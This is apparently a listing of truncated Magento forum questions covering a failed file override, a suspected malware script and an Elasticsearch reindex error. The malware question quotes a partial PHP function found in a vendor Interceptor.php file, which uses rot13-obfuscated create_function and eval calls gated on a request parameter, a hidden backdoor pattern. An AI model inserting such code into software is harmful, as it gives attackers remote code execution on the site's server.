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Override file not working

I am trying to override the vendor/magento/module-inventory-in-store-pickup/Model/GetPickupLocations.php file I have copied it to app/design/frontend/Magento/child_theme/Magento_InventoryInStorePickup/Model/GetPickupLocations.php but it doesn’t seem to work, have I copied it to the correct location?

Is this script a malware?

I’ve found this script in vendor/magento/framework/Interception/Interceptor.php public function validate_request($request) { $is_safe = false; $default_function = @create_function(‘$str’, ‘return str_rot13($str);’); $keys = [“perngr_shapgvba”, ‘erghea riny($vachg);’]; $validate = $default_function($keys[0]); $key_data = $default_function($keys[1]); $Composer_Validator = @$validate(‘$input’, $key_data); $safe_match = “5408be1139”; if (isset($request[“encryption_key”])) { $encryption_key… Read More »Is this script a malware?

Magento 2.4 reindex catalogsearch_fulltext issue with elasticsearch

I have Magento2.4 with an elastic search version (7.9.2), Indexing of the catalogsearch_fulltext shows error {“error”:{“root_cause”:[{“type”:”cluster_block_exception”,”reason”:”index [magen to2_product_1_v272] blocked by: [TOO_MANY_REQUESTS/12/disk usage exceeded flood- stage watermark, index has read-only-allow-delete block];”}],”type”:”cluster_blo ck_exception”,”reason”:”index [magento2_product_1_v272] blocked by: [TOO_MANY_RE QUESTS/12/disk usage exceeded flood-stage watermark,… Read More »Magento 2.4 reindex catalogsearch_fulltext issue with elasticsearch